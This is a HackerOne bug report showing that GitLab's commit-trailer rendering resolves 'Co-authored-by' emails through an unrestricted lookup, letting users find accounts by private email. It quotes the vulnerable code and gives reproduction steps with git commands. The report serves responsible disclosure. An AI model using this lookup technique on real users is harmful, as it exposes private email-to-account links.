Authenticated users can find other users by their private email
HackerOne report #1794713 by shells3c
on 2022-12-06, assigned to @rshambhuni:
Report
Summary
Since GitLab 14.7.1, 14.6.4, and 14.5.4, you can no longer find users by their non-public email, it's the fix for CVE-2022-0371. This is also documented in the official documentation. However, I found that I could still do it just by using a commit trailer, this happens because lib/banzai/filter/commit_trailers_filter.rb uses User.find_by_any_email
to find user handle from an email address, and User.find_by_any_email
doesn't respect the email policy at all:
def trailer_filter(text)
text.lines.map! do |line|
trailer, rest = line.split(':', 2)
next line unless trailer.downcase.end_with?('-by') && rest.present?
chunks = rest.split
author_email = chunks.pop.delete_prefix('<').delete_suffix('>')
next line unless Devise.email_regexp.match(author_email)
author_name = chunks.join(' ').strip
trailer = "#{trailer.strip}:"
"#{trailer} #{link_to_user_or_email(author_name, author_email, trailer)}\n"
end.join
end
def link_to_user_or_email(name, email, trailer)
link_to_user User.find_by_any_email(email),
name: name,
email: email,
trailer: trailer
end
Something like below:
commit cd330155a136985ada2c350c854a835afed1fb11 (HEAD -> h1test, origin/h1test)
Author: me <me@myemail.com>
Date: Tue Dec 6 14:36:00 2022 +0700
Commit message
Co-authored-by: foo <privateemail@gmail.com>
will be converted to:
<a href="https://gitlab.com/USERNAME" title="privateemail@gmail.com">
<img alt="FULL_NAME's avatar" src="..." class="avatar s16 avatar-inline" title="FULL_NAME">
</a>
<a href="https://gitlab.com/USERNAME" title="privateemail@gmail.com">foo</a>
<<a href="mailto:privateemail@gmail.com" title="privateemail@gmail.com">privateemail@gmail.com</a> >
Steps to reproduce
I will use my own email address in this test: hacker0x02@gmail.com
- Confirm that the email isn't public and can't be searched via the API by visiting
https://gitlab.com/api/v4/users?search=hacker0x02@gmail.com
Response:
[]
- Create a repository, clone it and do the following:
$ echo test > a.txt
$ git add -A
$ git commit -m '.
>
> Co-authored-by: a <hacker0x02@gmail.com>'
$ git checkout -b h1test
$ git push origin h1test
...
- Visit the repository, view Commits and you will find the commit
- Expand the commit and click on the avatar, you will be redirected to my Gitlab account
Output of checks
This bug happens on GitLab.com
Impact
Similar to CVE-2022-0371, users can look up accounts with private email addresses
How To Reproduce
Please add reproducibility information to this section: